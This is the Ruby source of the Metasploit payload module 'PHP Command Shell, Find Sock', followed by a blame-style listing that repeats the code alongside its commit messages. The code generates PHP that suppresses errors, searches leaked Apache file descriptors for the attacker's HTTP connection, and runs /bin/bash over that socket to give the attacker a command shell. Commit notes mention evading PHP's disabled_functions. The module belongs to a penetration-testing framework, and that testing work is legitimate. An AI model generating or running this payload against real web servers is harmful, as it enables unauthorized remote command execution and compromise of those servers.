metasploit-framework/modules/payloads/singles/php/shell_findsock.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
require 'msf/core/handler/find_shell'

module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Php
	include Msf::Sessions::CommandShellOptions

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'PHP Command Shell, Find Sock',
			'Version'       => '$Revision$',
			'Description'   => %Q{
				Spawn a shell on the established connection to
				the webserver.  Unfortunately, this payload
				can leave conspicuous evil-looking entries in the
				apache error logs, so it is probably a good idea
				to use a bind or reverse shell unless firewalls
				prevent them from working.  The issue this
				payload takes advantage of (CLOEXEC flag not set
				on sockets) appears to have been patched on the
				Ubuntu version of Apache and may not work on
				other Debian-based distributions.  Only tested on
				Apache but it might work on other web servers
				that leak file descriptors to child processes.
				},
			'Author'        => [ 'egypt <egypt@metasploit.com>' ],
			'License'       => BSD_LICENSE,
			'Platform'      => 'php',
			'Handler'       => Msf::Handler::FindShell,
			'Session'       => Msf::Sessions::CommandShell,
			'Arch'          => ARCH_PHP
			))
	end

	def php_findsock

		var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
		var_fd  = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
		var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
		shell = <<END_OF_PHP_CODE
error_reporting(0);
print("<html><body>");
flush();

function mysystem(#{var_cmd}){
	#{php_preamble()}
	#{php_system_block({:cmd_varname=>var_cmd, :output_varname => var_out})}
	return #{var_out};
}

#{var_fd} = 13;
for ($i = 3; $i < 50; $i++) {
	$foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
	if ($foo != $i) {
		#{var_fd} = $i - 1;
		break;
	}
}
print("</body></html>\n\n");
flush();

#{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";
mysystem(#{var_cmd});

END_OF_PHP_CODE


		return shell
	end

	#
	# Constructs the payload
	#
	def generate
		return php_findsock
	end

end
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`##`
Set property 'svn:keywords' git-svn-id: file:///home/svn/framework3/trunk@5783 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-23 02:43:21 +00:00			`# $Id$`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`##`

			`##`
adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`##`

			`require 'msf/core'`
			`require 'msf/core/payload/php'`
			`require 'msf/core/handler/bind_tcp'`
			`require 'msf/base/sessions/command_shell'`
adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00			`require 'msf/base/sessions/command_shell_options'`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`require 'msf/core/handler/find_shell'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`module Metasploit3`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00
			`include Msf::Payload::Single`
			`include Msf::Payload::Php`
adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00			`include Msf::Sessions::CommandShellOptions`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00
			`def initialize(info = {})`
			`super(merge_info(info,`
change the name to not lie git-svn-id: file:///home/svn/framework3/trunk@9889 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-20 20:21:54 +00:00			`'Name' => 'PHP Command Shell, Find Sock',`
Set property 'svn:keywords' git-svn-id: file:///home/svn/framework3/trunk@5783 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-23 02:43:21 +00:00			`'Version' => '$Revision$',`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`'Description' => %Q{`
			`Spawn a shell on the established connection to`
updated info for payload/php/shell_findsock git-svn-id: file:///home/svn/framework3/trunk@6231 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-17 06:04:02 +00:00			`the webserver. Unfortunately, this payload`
change the name to not lie git-svn-id: file:///home/svn/framework3/trunk@9889 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-20 20:21:54 +00:00			`can leave conspicuous evil-looking entries in the`
updated info for payload/php/shell_findsock git-svn-id: file:///home/svn/framework3/trunk@6231 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-17 06:04:02 +00:00			`apache error logs, so it is probably a good idea`
			`to use a bind or reverse shell unless firewalls`
			`prevent them from working. The issue this`
			`payload takes advantage of (CLOEXEC flag not set`
			`on sockets) appears to have been patched on the`
			`Ubuntu version of Apache and may not work on`
			`other Debian-based distributions. Only tested on`
			`Apache but it might work on other web servers`
			`that leak file descriptors to child processes.`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`},`
			`'Author' => [ 'egypt <egypt@metasploit.com>' ],`
			`'License' => BSD_LICENSE,`
			`'Platform' => 'php',`
			`'Handler' => Msf::Handler::FindShell,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'Arch' => ARCH_PHP`
			`))`
			`end`

			`def php_findsock`

remove debug statements, add disabled_functions evasion in php findsock stuff git-svn-id: file:///home/svn/framework3/trunk@5700 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-30 19:56:16 +00:00			`var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)`
			`var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)`
			`var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`shell = <<END_OF_PHP_CODE`
remove debug statements, add disabled_functions evasion in php findsock stuff git-svn-id: file:///home/svn/framework3/trunk@5700 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-30 19:56:16 +00:00			`error_reporting(0);`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`print("<html><body>");`
			`flush();`

remove debug statements, add disabled_functions evasion in php findsock stuff git-svn-id: file:///home/svn/framework3/trunk@5700 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-30 19:56:16 +00:00			`function mysystem(#{var_cmd}){`
			`#{php_preamble()}`
			`#{php_system_block({:cmd_varname=>var_cmd, :output_varname => var_out})}`
			`return #{var_out};`
			`}`

			`#{var_fd} = 13;`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`for ($i = 3; $i < 50; $i++) {`
remove debug statements, add disabled_functions evasion in php findsock stuff git-svn-id: file:///home/svn/framework3/trunk@5700 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-30 19:56:16 +00:00			`$foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`if ($foo != $i) {`
remove debug statements, add disabled_functions evasion in php findsock stuff git-svn-id: file:///home/svn/framework3/trunk@5700 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-30 19:56:16 +00:00			`#{var_fd} = $i - 1;`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`break;`
			`}`
			`}`
			`print("</body></html>\n\n");`
			`flush();`

remove debug statements, add disabled_functions evasion in php findsock stuff git-svn-id: file:///home/svn/framework3/trunk@5700 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-30 19:56:16 +00:00			`#{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";`
			`mysystem(#{var_cmd});`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00
			`END_OF_PHP_CODE`

adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-24 04:41:51 +00:00			`return shell`
			`end`

			`#`
			`# Constructs the payload`
			`#`
			`def generate`
			`return php_findsock`
			`end`

updated info for payload/php/shell_findsock git-svn-id: file:///home/svn/framework3/trunk@6231 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-17 06:04:02 +00:00			`end`